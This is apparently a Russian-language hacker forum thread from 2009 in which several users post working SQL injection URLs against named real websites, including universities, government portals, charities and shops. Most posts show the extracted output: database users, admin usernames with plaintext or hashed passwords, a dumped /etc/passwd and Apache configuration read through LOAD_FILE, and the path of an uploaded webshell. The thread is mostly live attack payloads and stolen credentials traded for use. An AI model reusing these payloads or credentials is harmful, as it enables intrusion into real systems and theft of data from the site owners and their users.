http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+login+FR OM+user+limit+0,1),1,1))=119 w
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+login+FR OM+user+limit+0,1),2,1))=101 e
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+login+FR OM+user+limit+0,1),3,1))=98 b
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+login+FR OM+user+limit+0,1),4,1))=100 d
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+login+FR OM+user+limit+0,1),5,1))=111 o
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+login+FR OM+user+limit+0,1),6,1))=103 g
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+login+FR OM+user+limit+0,1),7,1))=0

его пароль:
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+passwd+F ROM+user+limit+0,1),1,1))=122 z
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+passwd+F ROM+user+limit+0,1),2,1))=97 a
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+passwd+F ROM+user+limit+0,1),3,1))=110 n
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+passwd+F ROM+user+limit+0,1),4,1))=117 u
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+passwd+F ROM+user+limit+0,1),5,1))=115 s
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+passwd+F ROM+user+limit+0,1),6,1))=115 s
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+passwd+F ROM+user+limit+0,1),7,1))=105 i
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+passwd+F ROM+user+limit+0,1),8,1))=0

drumnet.ru Ещё один известный сайт барабанщиков)
http://drumnet.ru/viewevent.php?id_pub=-99999+union+select+1,concat_ws(0x3a,user(),databas e(),version()),3,4,5,6+--+

юзер - z49030_drumnet@77.221.130.14
бд - z49030_drumnet
версия MySQL - 5.0.51a-12-log

edichka

21.02.2009, 08:46

carc.jo pr 6

http://www.carc.jo/pages_en.php?type=page&id=-1+union+select+concat_ws(0x3a3a,version(),database (),user())

5.0.67-community-log::carcgov_marka::carcgov_marka@localhost

http://carc.jo/admin/ - админка basic

shonenjump.com pr 5

http://www.shonenjump.com/news/contest/winners/index.php?id=-5+union+select+concat_ws(0x3a3a,version(),database (),user()),2,3,4,5

5.0.45-Debian_1ubuntu3.4-log::sj_cms::shonenjump@vpersuadertron

R1dex

21.02.2009, 09:12

Сеть информационно-платежных киосков "Мгновенно"

http://www.mgnoveno.ru/index.php?p=news&act=more&news_id=102+and+ascii(substring((select+1+from+use r+limit+1),1,1))%3E1--

Gorev

21.02.2009, 10:34

http://www.ic-computers.ro/content/html/index.php?a=show_prod&pid=256+AND+ASCII(SUBSTRING((select+version()),1,1 ))=37--

Version : 5.0.67-community
Database : iccomput_iccomputers
User : iccomput_iccomputers@localhost

Kraneg

21.02.2009, 12:57

athabascau.ca - PR7
http://www.athabascau.ca/aboutau/news/news_item.php?id=319%27+UNION+SELECT+1,concat_ws(0 x3a,version(),user(),database()),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34/*
DB_Ver:5.0.45
DB_User:wiu_webuser@localhost
DB:db_wiu
В принципе есть таблица news_login с полями id,username,password вот пример запроса:
http://www.athabascau.ca/aboutau/news/news_item.php?id=319%27+UNION+SELECT+1,concat_ws(0 x3a,id,username,password),3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34+FROM+news_login/*
И собственно вот ид,логин и пароль
0:admin:ccsadmin108
но где это использовать неизвестно =)

ПаВлУшКа

21.02.2009, 13:25

http://www.wedasoft.at/en/promos.php?id=-9+union+select+1,2,3,4,5,6,7,8
.....

Kraneg

21.02.2009, 14:33

omnibc.ca - PR5
http://www.omnibc.ca/programming/details.php?id=999999%27+UNION+SELECT+concat_ws(0x 3a,version(),user(),database()),2,3,4,5,6/*
DB_Ver: 5.0.45
DB_User: omnibc@localhost
DB: omnibc_08_2008
админка:
http://www.omnibc.ca/admin/
Теперь выясним пароль и логин доступа к админке... Впрочем это не трудно... Таблица с админами называется user а поля id,username,password,role... нам интересны второе и третье, то есть username и password
http://www.omnibc.ca/programming/details.php?id=999999%27+UNION+SELECT+concat_ws(0x 3a,username,password),2,3,4,5,6+FROM+user+LIMIT+0, 1/*
Всего 4 пользователя с просто потрясными паролями =) сначала думал что шутка =)
james:jamespass
user:userpass
news:newspass
community:communitypass

M.W.N.N.

21.02.2009, 16:35

http://www.fire.nsw.gov.au/news.php?news=837+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12+limit+1,1/*

DB_Ver: 4.0.24-nt-max-log
DB_User: vs161854_1@wic036p.server-web.com
DB: vs161854_1

Kraneg

21.02.2009, 19:27

judoontario.ca - PR5
http://www.judoontario.ca/current_news.php?id=656565%27+UNION+SELECT+1,2,con cat_ws(0x3a,version(),user(),database()),4/*

DB_Ver:4.1.20
DB_User:judo1@localhost
DB:judo
Теперь выясним имена пользователей и их пароли =) Таблица называется members! Поля username,password
http://www.judoontario.ca/current_news.php?id=656565%27+UNION+SELECT+1,2,con cat_ws(0x3a,username,password),4+from+members/*
выводятся все =)

AkyHa_MaTaTa

21.02.2009, 20:13

2ПаВлУшКа
Там идет басик авторизация(может кто уже воткнул).

PR-6 www.irma-grenoble.com

http://www.irma-grenoble.com/04risques_isere/00commune_photos.php?NumeroINSEE=-1)+union+select+1,concat_ws(0x3A,user(),version(), database()),3,4,5,6,7,8,9,10,11,12,13,14,15+--+

irma38@localhost:4.1.19:irma38_communes

PR-4 www.solverde.pt

http://www.solverde.pt/casinos/index.php?lg=1&p=134&d=2&i=-22718+union+select+1,2,3,4,concat_ws(0x3A,user,pas sword,host,file_priv),6+from+mysql.user+limit+5,1--

phpuser:341d6ca146c27aa7:localhost:Y

http://www.solverde.pt/casinos/index.php?lg=1&p=134&d=2&i=-22718+union+select+1,2,3,4,LOAD_FILE(0x2f6574632f7 06173737764),6--

Конфиг апача

http://www.solverde.pt/casinos/index.php?lg=1&p=134&d=2&i=-22718+union+select+1,2,3,4,LOAD_FILE(0x2f6574632f6 8747470642f636f6e662f68747470642e636f6e66),6--

Glazz

21.02.2009, 20:42

http://psy-trening.com/reply.php?id=-1+union+select+1,2,3,4,5,6--
Может будет интересно.

sabe

21.02.2009, 21:20

Juilliard.edu
http://bookstore.juilliard.edu/shopping/display_image.php?id=-98612+union+select+1,load_file(0x2f7661722f7777772 f626f6f6b73746f72652f61646d696e2f696e6465782e70687 0),3/*

Missouri.edu
http://majors.missouri.edu/viewmajor.php?mid=-179+union+select+1,2,3,4,versioN(),6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31--

Neu.edu
http://www.policyschool.neu.edu/news/index.php?nid=-18+union+select+1,versioN(),3,4,5,6,7,8,9,10,11,12 ,13,14,15/*

Wccs.edu
http://www.wccs.edu/news/article.php?nid=-209+union+select+1,2/*

Kraneg

21.02.2009, 21:56

coalition-sgsl.ca - PR4
http://www.coalition-sgsl.ca/news.php?news=16+UNION+SELECT+1,2,3,4,5,6,7,8,9,10 ,11,concat_ws(0x3a,version(),user(),database()),13/*

DB_Ver: 5.0.45-community-nt-log
DB_User: webcura_sgsl@www.connetik.com
DB: webcura_sgsl

faza02

21.02.2009, 22:33

http://dr-gng.dp.ua/index.php?act=publ&id=-10+UNION+SELECT+1,version(),3,4,5

5.0.67-community

http://perfumes4you.kiev.ua/index.php?act=publ&id=-19+UNION+SELECT+version(),2,3,4,5,6

5.0.67-community

http://www.med-tech.kiev.ua/index.php?act=publ&id=-12+UNION+SELECT+version(),2,3,4,5

5.0.67-community

http://forex-4-all.ru/index.php?act=publ&id=-2+UNION+SELECT+version(),2,3,4,5

4.1.22-standard

Kraneg

21.02.2009, 22:52

steamwhistle.ca - PR6
http://www.steamwhistle.ca/events/eventdetail.php?EventID=-146+UNION+SELECT+1,concat_ws(0x3a,version(),user() ,database()),3,4,5,6,7,8,9,10,11,12,13,14/*
DB_ver: 5.0.24a-log
DB_User: u70604077@cgihost
DB: d60541981

faza02

21.02.2009, 23:04

http://russia-forex.ru/index.php?act=publ&id=-2+UNION+SELECT+version(),2,3,4,5&page=

4.1.22-standard

[JavaScript]

21.02.2009, 23:32

Похоронный портал - funeralportal.ru - PR 4
http://www.funeralportal.ru/catalog.php?SubjectId=445+union+select+1,2,concat_ ws(0x3a,user(),database(),version()),4,5,6,7,8,9
user:database:version
u58626@10.10.223.217:u58626:5.0.67-log

AkyHa_MaTaTa

21.02.2009, 23:35

PageRank: 5 www.tina-b.com

http://www.tina-b.com/content.php?season=2007&A9=en&akce=section&id=-2123+union+select+1,2,3,4,concat_ws(0x3A,@@version ,user(),database()),6,7,8,9,10,11,12+--+

PageRank: 5 www.salon.eu.sk

http://www.salon.eu.sk/author.php?author=-68'+union+select+1,concat_ws(0x3A,@@version,user() ,database()),3+--+

[JavaScript]

21.02.2009, 23:45

crystallakenet.org - PR 4
http://www.crystallakenet.org/subject.php?subjectID=-62+union+select+concat_ws(0x3a,user(),database(),v ersion())
user:database:version
library2_ciab@localhost:library2_ciab:4.1.22-standard

sA21
Yvajaemee Guru
Я не гуру, но все же помогу.
4133e372138889e4ef3cb1ac01cb85edпароль - rotideez.
chem polzevatsa
https://hashcracking.info/index.php
ishto eto za yazek
http://ru.wikipedia.org/wiki/md5

22.02.2009, 01:52

wac.org.ua/wacindex.php?id=-5+UNION+SELECT+1,2,3
4.1.22-standard-log
wac_a:s8bl656
=
http://travel.org.ua/water/index.php?id=-5+UNION+SELECT+1,2,file_priv,4,5+from+mysql.user/*
N =(
travel.org.ua/water/index.php?id=-5+UNION+SELECT+1,2,3,4,5
5.0.22
1000 ТИЦ
=
kievrealtor.org.ua/news.php?id=-5+UNION+SELECT+1,2,3,4
http://kievrealtor.org.ua/news.php?id=-5+UNION+SELECT+1,2,3,4+from+owner
4.1.22-standard
=
okno-v-mir.org.ua/oknoindex.php?id=-5+UNION+SELECT+1,2,3
http://okno-v-mir.org.ua/oknoindex.php?id=-5+UNION+SELECT+1,2,concat(login,0x3a,password)+fro m+users
http://okno-v-mir.org.ua/admin/admin.php
ovm_a:s8bl656
4.1.22-standard-log
=
www.frankivsk-fm.org.ua/new.php?id=-5+UNION+SELECT+1,2,3,4,5,6,7,8

Gorev

22.02.2009, 02:27

http://www.lutek.ro/car.php?codp=1056 AND ASCII(SUBSTRING((select version())1,1))=x

x=53,46,48,46,54,55,45,99,111,109,109,117,110,105, 116,121

http://www.lutek.ro/car.php?codp=1056 AND ASCII(SUBSTRING((select database())1,1))=x

x=108,117,117,116,101,107,95,103,101,57,50,108,114

http://www.lutek.ro/car.php?codp=1056 AND ASCII(SUBSTRING((select user()),1,1))=x

x=108,117,117,116,101,107,95,117,115,101,114,64,10 8,111,99,97,108,104,111,115,116

Version : 5.0.67-community
Database : luutek_ge92lr
User : luutek_user@localhost

AkyHa_MaTaTa

22.02.2009, 02:37

Page Rank 5 www.bioenergetic.hu
Какой то вебшоп самопальный

http://www.bioenergetic.hu/index.php?module=webshop&target=view&id=93+union+select+1,concat_ws(0x3A,name,password) ,3,4+from+bioenergetic.tps_user+limit+0,1+--+

admin:217a968c3f6a1d9d9cf8784d1c83ca43 - admin:tibor

админка какая то стремная но шелл наверно можно подлить:

http://www.bioenergetic.hu/admin.php

PR -6 www.streetchildren.org.uk, я как database() увидел аш крякнул :).

http://www.streetchildren.org.uk/resources/details/?type=theme&Reg%3Cbr%20/%3Eion=&country=&key_theme=&theme=-125+union+select+1,2,concat_ws(0x3A,user,password, host,file_priv),4,5,6,7,8+from+mysql.user+--+&other=&publication=

Gorev

22.02.2009, 03:06

2 AkyHa_MaTaTa

http://www.bioenergetic.hu/images/webshop/ezoterikus_termekek_ekszerek_egyeb/webshell.php

http://www.valera.ro/catalog.php?pid=-40+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8

Database Version: 5.0.32-Debian_7etch8-log
Database name: valera
User name: valera@localhost

Assembler

22.02.2009, 03:11

http://www.sales-akzent.ru/index2.php?s=42%20union%20select%201,2,version()--

4.1.22

http://www.kklife.kz
PR: 4
Òèö: 20
Версия: 5.0.67-community
БазаДанных: kklifek_kkl
Пользователь: kklifek_kkl@localhost
http://www.kklife.kz/text.php?top=5&left=-1%20union%20select%201,group_concat(column_name),3 ,4,5,6%20from%20information_schema.columns%20where %20table_name=0x666f72756d5f7573657273--
Админка: http://www.kklife.kz/admin.php

faza02

22.02.2009, 09:31

http://scotland.org.ua/index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,5
version(): 5.0.67-community
database(): qwertyadm1_scOtL
user(): qwertyadm1_rma6l@localhost

http://scotland.org.ua/admin/
login: admin
passwd: paLz5C9qm1

Gorev

22.02.2009, 10:25

http://www.extream.ro/index.php?categorie=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,vers ion(),database(),user()),10--

Version : 5.0.51b
Database : forum_test
User : root@localhost

Assembler

22.02.2009, 12:24

http://1.chudovo.peterhost.ru/tex.php?id=-127%20union%20select%20version()%20--

4.1.22-log

M.W.N.N.

22.02.2009, 12:42

http://tariffs.lbl.gov/utility/utility.php?util_id=1256%27+union+select+1,version (),3,4,5,6,7,8,9,10,11+limit+1,1/*

Version : 5.0.45
Database : TARIFF
User : PAHARRIS@MINOTAUR.LBL.GOV

http://www.aer.mil.br/portal/capa/index.php?mostra=1436+union+select+1,2,3,version() ,5,6,7,8,9,10,11,12,13,14,15+limit+1,1/*

Version : 5.0.32-Debian_7etch8-log
Database : dbenoticias
User : cecomsaer@172.16.1.117

spherics

22.02.2009, 13:33

Не люблю фирму SAGEM

http://www.sagem.com/mobiles/index.php?id=11&news_id=-67/**/union/**/select/**/1,2,concat_ws(0x3a,version(),user(),database()),4, 5,6,7,8,9,10,11/*&news_cat=05

Database Version: 4.0.24_Debian-10sarge1-log
Database name: scm_mobiles
User name: scm_mobiles_adm@localhost

[JavaScript]

22.02.2009, 13:48

http://www.smartdokis.palsoftweblink.com/mynews.php?newsID=-2+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5
user():database():version()
palsoftw_root@localhost:palsoftw_smartdoc:5.0.67-community-log

Gorev

22.02.2009, 14:21

http://www.istyle.ro/i_category.php?id=-9375+union+select+1,concat_ws(0x3a,version(),datab ase(),user()),3,4,5,6,7,8,9,10,11,12,13

Database Version: 4.1.22-log
Database name: sql_applestore_mg
User name: sqladmin@ns.macgallery.ro

http://www.istyle.ro/i_category.php?id=-9375+union+select+1,load_file(0x2F6574632F70617373 7764),3,4,5,6,7,8,9,10,11,12,13

## # User Database # # Note that this file is consulted when the system is running in single-user # mode. At other times this information is handled by one or more of: # lookupd DirectoryServices # By default, lookupd gets information from NetInfo, so this file will # not be consulted unless you have changed lookupd's configuration. # This file is used while in single user mode. # # To use this file for normal authentication, you may enable it with # /Applications/Utilities/Directory Access. ## nobody:*:-2:-2:Unprivileged User:/:/usr/bin/false root:*:0:0:System Administrator:/var/root:/bin/sh daemon:*:1:1:System Services:/var/root:/usr/bin/false lp:*:26:26:Printing Services:/var/spool/cups:/usr/bin/false postfix:*:27:27:Postfix User:/var/spool/postfix:/usr/bin/false www:*:70:70:World Wide Web Server:/Library/WebServer:/usr/bin/false eppc:*:71:71:Apple Events User:/var/empty:/usr/bin/false mysql:*:74:74:MySQL Server:/var/empty:/usr/bin/false sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false qtss:*:76:76:QuickTime Streaming Server:/var/empty:/usr/bin/false cyrusimap:*:77:6:Cyrus IMAP User:/var/imap:/usr/bin/false mailman:*:78:78:Mailman user:/var/empty:/usr/bin/false appserver:*:79:79:Application Server:/var/empty:/usr/bin/false clamav:*:82:82:Clamav User:/var/virusmails:/bin/tcsh amavisd:*:83:83:Amavisd User:/var/virusmails:/bin/tcsh jabber:*:84:84:Jabber User:/var/empty:/usr/bin/false xgridcontroller:*:85:85:Xgrid Controller:/var/xgrid/controller:/usr/bin/false xgridagent:*:86:86:Xgrid Agent:/var/xgrid/agent:/usr/bin/false appowner:*:87:87:Application Owner:/var/empty:/usr/bin/false windowserver:*:88:88:WindowServer:/var/empty:/usr/bin/false tokend:*:91:91:Token Daemon:/var/empty:/usr/bin/false securityagent:*:92:92:SecurityAgent:/var/empty:/usr/bin/false unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false

http://www.istyle.ro/i_category.php?id=-9375+union+select+1,concat_ws(0x3a,user,password), 3,4,5,6,7,8,9,10,11,12,13+from+mysql.user

sqladmin: *29C30F3228837BB0384A9F3DC58FF79173D5F952

[JavaScript]

22.02.2009, 14:32

http://www.groundstarresources.com/news/news.php?newsID=-11+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6,7
user():database():version()
groundstar@localhost:groundstar_news:5.0.45

M.W.N.N.

22.02.2009, 18:21

http://www.designzero3.co.za/clients.php?id=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17/*
http://www.designzero3.co.za/clients.php?id=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,version(),17+from+user/*
__
http://uamp.wits.ac.za/sebs/staff_individual.php?id=239+union+select+1,2,3,4,5 ,6,7,8,9,10,11,12,version(),14,15,16,17,18,19,20+l imit+1,1/*

Version : 5.0.45-log
Database : sebs
User : sebsadmin@localhost
____
http://www.bulacan.gov.ph/newsarticle.php?id=450+union+select+version(),2,3, 4,5,6+limit+1,1/*

Version : 5.0.45-community-nt
Database : bulacan
User : bulacan-gov@localhost
_____

http://www.governmentofbelize.gov.bz/press_release_details.php?pr_id=4187%27+union+sele ct+1,2,3,4,5,6,7,8,9,10,11,version(),13+from+users +limit+1,1/*

Version : 4.1.20
Database : govbz
User : govusr2@localhost

http://www.governmentofbelize.gov.bz/press_release_details.php?pr_id=4187'+union+select +1,2,3,4,5,6,7,8,9,10,11,concat(username,0x3a,pass word,0x3a,email),13+from+users+limit+1,1/*

username:password:email
ils_admin:f68dc9f61324eb52c825ae2ac2d39fe8:tmarin@ idealabstudios.com
__
http://www.yzagri.gov.cn/newssubjectdetail.php?ej=&mainid=1064802412&infoid=1064802412+union+select+1,version(),3+from+ user+limit+1,1

Version : 5.0.67-0ubuntu6
Database : yzagri
User : root@localhost

http://www.yzagri.gov.cn/newssubjectdetail.php?ej=&mainid=1064802412&infoid=1064802412+union+select+1,concat(UserId,0x3 a,password,0x3a,email),3+from+user+limit+1,1

ПаВлУшКа

22.02.2009, 19:47

http://www.rotary9640.org/bookmarks/view_group.php?id=-2+union+select+1,2,version(),4,5,6,7,8--

wildshaman

22.02.2009, 20:08

http://www.ruy.ru/news.html?did=-1+union+select+null,null,null,null,null,null,null, null,null,null,CONVERT(concat_ws(0x3a,user(),Versi on(),database()),binary),12,13,14,111111111,16,17, 18,19,20,21,22,23,24,25,26+--

ruy@localhost:4.1.18-log:ruy
http://www.veshnyaki.ru/news.html?did=9999+union+select+null,null,null,nul l,null,null,null,null,9,CONVERT(concat_ws(0x3a,use r(),Version(),database()),binary),11,12,13,14,15+--
vesh_vesh@localhost:4.1.18-log:vesh_vesh

SEWERN

22.02.2009, 21:52

http://www.ukrgo.com/view_subsection.php?id_subsection=195%20union%20se lect%201,2,3,user(),5,6--&vd=1_5
http://www.ukrgo.com/view_subsection.php?id_subsection=195%20union%20se lect%201,2,3,version(),5,6--&vd=1_5
http://www.vms.kiev.ua/index.php?kat_id=-1+union+select+1,user()--

Rubaka

22.02.2009, 23:35

http://www.itsonlynatural.us/display.php?t=12/**/UNION/**/SELECT/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,10, 11/**/FROM/**/itonlnatweb_db.auth_user_md5/**/LIMIT/**/1,1/*

admin:a01726b559eeeb5fc287bf0098a22f6c
PASS:@dm1n
админка http://www.itsonlynatural.us/admin

но чото не заходит (((((

попугай

22.02.2009, 23:50

http://www.rosrealt.ru/news.php?id=-93+union+select+1,2,3,concat_ws(0x3a,user(),databa se(),version()),5,6,7,8,9,10,11,12,13--

rosrealt@localhost:rosrealt:5.0.26-log

http://www.zfmaster.ru/createstr.php?rid=-20081018135956+union+select+concat_ws(0x3a,databas e(),version(),user()),2,3--

zfmaste0_zfmaster:4.1.22-log:zfmaste0_zuzick@localhost

Dimionx

23.02.2009, 00:01

e-portal.com.ua

http://www.e-portal.com.ua/news.php?id=4+union+select+1,concat_ws(0x3a,versio n(),user(),database()),3,4,5,6,7,8,9,10,11,12,13

Версия - 5.0.51a-log
Юзер - ukrfoto_user@s8
БД - ukrfoto_db

Таблички:

http://www.e-portal.com.ua/news.php?id=4+union+select+1,table_name,3,4,5,6,7, 8,9,10,11,12,13+from+information_schema.tables

Колонки:

http://www.e-portal.com.ua/news.php?id=4+union+select+1,column_name,3,4,5,6,7 ,8,9,10,11,12,13+from+information_schema.columns

Gorev

23.02.2009, 00:22

http://www.mediaexpres.ro/index.aspx?id=-36+or+1=@@version

Microsoft SQL Server 2005 - 9.00.3068.00 (Intel X86)
Feb 26 2008 18:15:01
Copyright (c) 1988-2005 Microsoft Corporation
Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

Tables

http://www.mediaexpres.ro/index.aspx?id=-36+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_ SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(SELECT+ALL+ TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES))

[JavaScript]

23.02.2009, 00:29

http://www.dib.ucg.gr/proswpiko_en.php?id=102+union+select+null,null,nul l,null,concat_ws(0x20,user(),database(),version()) ,null,null,null,null,null,null,null,null,null,null/*

PS: Номер поста кругленький :)

Gorev

23.02.2009, 00:39

http://www.myneletv.ro/index.php?page=40+AND+ASCII(SUBSTRING((select+vers ion()),1,1))>x

x=53,46,48,46,52,53

http://www.myneletv.ro/index.php?page=40+AND+ASCII(SUBSTRING((select+data base()),1,1))>x

x=109,121,110,101,108,101,116,118

http://www.myneletv.ro/index.php?page=40+AND+ASCII(SUBSTRING((select+user ()),1,1))>x

x=109,121,110,101,108,101,116,118,64,108,111,99,97 ,108,104,111,115,116

Version : 5.0.45
Database : myneletv
User : myneletv@localhost

Assembler

23.02.2009, 12:06

http://www.dedenksportkampioen.be/?pagina=go.php&item=1&id=1%20union%20select%201,2,version(),4,5,6,7,8,9--

4.1.22-standard

F4R

23.02.2009, 13:24

оф сайт Edimax
http://www.edimax.com/en/produce_detail.php?pd_id=8&pl1_id=1&pl2_id=-1+union+select+1,concat(a_name,0x3a,a_psword,0x3a, a_level,0x3a,fixuser,0x3a,fixtime)+from+cn_admin+l imit+0,1/*

Dimionx

23.02.2009, 14:22

gippo.by

http://gippo.by/news.php?ID=8+union+select+1,2,3,4,concat_ws(0x3a, version(),user(),database())/*

Версия: 5.0.24a-Debian_3-log
Юзер: gippoby@localhost
БД: gippoby

http://gippo.by/news.php?ID=8+union+select+1,2,3,4,concat_ws(0x3a, table_name,column_name)+from+information_schema.co lumns/*

- таблички и колонки к ним

http://gippo.by/news.php?ID=8+union+select+1,2,3,4,concat_ws(0x3a, LOGIN,PASS,EMAIL)+from+gippo_Users/*

www.ecogran.ru

http://www.ecogran.ru/news.php?id=-8+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6,7/*

Версия - 5.0.32-Debian_7etch3-log
Юзер - zorro_ecogran@localhost
БД - zorro_ecogran

http://www.ecogran.ru/news.php?id=-8+union+select+1,2,concat_ws(0x3a,table_name,colum n_name),4,5,6,7+from+information_schema.columns+li mit+1,1/*

Таблички и колонки

antennachel.ru

http://antennachel.ru/news.php?id=8+union+select+1,2,3,4,concat_ws(0x3a, version(),user(),database())

Версия - 5.0.45
Юзер - db_antennachel@localhost
БД - antennachel_main

http://antennachel.ru/news.php?id=8+union+select+1,2,3,4,concat_ws(0x3a, table_name,column_name)+from+information_schema.co lumns

Таблички и колонки

SEWERN

23.02.2009, 19:35

ТАБЛЫ
http://www.asinfo.com.ua/news_rss/news.php?id=475+union+select+1,2,3,table_name,5+fr om+information_schema.tables--
ЮЗЕР - asinfoc_asinfou@localhost
ВЕРСИЯ - 5.0.67-community-log

Gorev

23.02.2009, 20:40

http://www.microcomputer.ro/catalog/Catalog%20de%20produse/Oxigen%20O93%20pentru%20acasa/-7+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,versio n(),database(),user()),9,10.html

Database Version: 5.0.51a
Database name: microcomputer06
User name: sistem@195.254.134.82

f1ng3r

23.02.2009, 20:53

Kino-Club.ru
PR - 5
Тиц - 325

http://www.kino-club.ru/catalog_2.php?id=74+union+select+1,2,3,4,concat _ws(0x3a,version(),use r(),database()),6,7--&open=1

Database Version : 5.0.67-log
Database name : a900101722_kino@217.112.42.66
User name : a900101722_kino

Gorev

23.02.2009, 21:58

http://www.luxartim.ro/catalog/mobila/Baruri/-46+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user()),6.html

Database Version: 5.0.37
Database name: luxartim
User name: luxartim@localhost

ПаВлУшКа

23.02.2009, 22:09

http://www.catholicleader.com.au/index.php?id=-4680+union+select+1,2,3,unhex(hex(version())),5,6, 7,8--

Gorev

23.02.2009, 22:23

http://www.imobilesiterenuri.ro/anunt/oferte-vanzari-garsoniera_-83+UNION+SELECT+1,2,3,database(),user(),6,version( ),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42,43,44,45,46,47.html

Version : 5.0.37
Database : imobilesiterenuri
User : imobiliare_01@localhost

look in title...

spherics

23.02.2009, 23:12

PageRank 6

http://www.ncpad.org/events/index.php?id=-132+union+select+null,null,null,null,null,null,nul l,null,null,null,null,null,null,version(),null--

Version : PostgreSQL 7.3.21-RH on i686-redhat-linux-gnu, compiled by GCC gcc (GCC) 3.2.3 20030502 (Red Hat Linux 3.2.3-59)
Database : ncpadorg_ncpad
user : ncpadorg_www

http://www.fengyang.gov.cn/en/invest_view.php?id=189098380982+union+select+1,2,3 ,4,concat_ws(0x3a,version(),user(),database()),6,7 ,8,9,10,11--&ty=16

Version:4.0.16-standard
User: fengyang@localhost
Database: fengyang_web

faza02

24.02.2009, 00:00

http://www.mothernaturalclean.com/int.php?id=41+and+0+union+select+1,2,version()--

5.0.51b-community-nt

всех с 23.. грац!

hackmen

24.02.2009, 00:15

PR6
Peace Talks :: Peace & Security

http://www.ploughshares.org/news.php?id=-540+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19--

4.0.24_Debian-10sarge2-log

PR5
Children's Cause for Cancer Advocacy

http://www.childrenscause.org/news.php?id=-201+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,version()--

4.1.22-log

PR6
Columbus Museum of Art

http://www.columbusmuseum.org/about/news.php?id=-13+union+select+1,unhex(hex(version())),3,4,5,6,7, 8,9--

4.1.12-standard

spherics

24.02.2009, 00:15

PageRank 7

http://library.mcmaster.ca/php/blog.php?id=-12+union+select+null,null,null,null,null,version() ,null,null,null--&display=full

PostgreSQL 8.3.6 on i386-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.3.0 20080428 Red Hat 4.3.0-8

http://library.mcmaster.ca/php/blog.php?id=-12+union+select+null,null,null,null,null,tablename ,null,null,null+from+pg_tables--&display=full

Да да да с праздником вас !

http://www.nwegg.org.uk/view_event.php?id=71709380982+union+select+1,conca t_ws(0x3a,version(),user(),database()),3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19--

Version: 4.1.22-standard-log
User: nwegg@localhost
Database: nwegg

http://www.getaway.co.za/content/getaway/magazine/blogs/singlepage.asp?id=132%20or%201=@@version--

Microsoft SQL Server 2005 - 9.00.3159.00 (Intel X86) Mar 23 2007 16:15:11 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

PageRank = 6

http://www.ettu.org/ettucup_news_view.php?id=69897179879832+UNION+SELE CT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Version() ,0x3a,Database(),0x3a,User(),0x3a),0x71),0x71),3,4 ,5,6,7,8,9,10,11--

Database Version: 4.1.10-standard
Database name: ettu_db01
User name: ettu_admin@localhost

PageRank = 5

http://www.exim.lv/?module=events&do=show&id=1987379872987+union+select+1,2,3,4,5,6,7,8,conc at_ws(0x3a,version(),user(),database()),10,11,12,1 3,14,15--

Database Version:4.1.22
User name: liaa_exim@localhost
Database name: liaa_exim

PageRank = 6

http://www.fundacioperlapau.org/interior_actualitat.php?ID=17987986532+union+selec t+1,2,concat_ws(0x3a,version(),user(),database()), 4,5,6,7--

Database Version: 5.0.32-Debian_7etch8
Database name: perlapau
User name: perlapau@pau.pangea.org

PageRank = 6

http://www.worldvision.org.sg/CF-Catalogue.php?catID=3+union+select+1,concat_ws(0x3 a,version(),user(),database()),3,4,5,6--

Version: 5.0.24a-community-nt
User: worldvisionorgsg@localhost
Database: worldvisionorgsgdata